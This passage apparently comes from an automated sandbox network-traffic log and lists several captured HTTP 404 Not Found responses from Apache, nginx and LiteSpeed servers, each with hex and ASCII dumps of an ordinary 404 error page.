73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 
73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:11 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 
73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:14 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 
6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:28 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:31 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:34 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:58:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:58:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:59:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:59:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
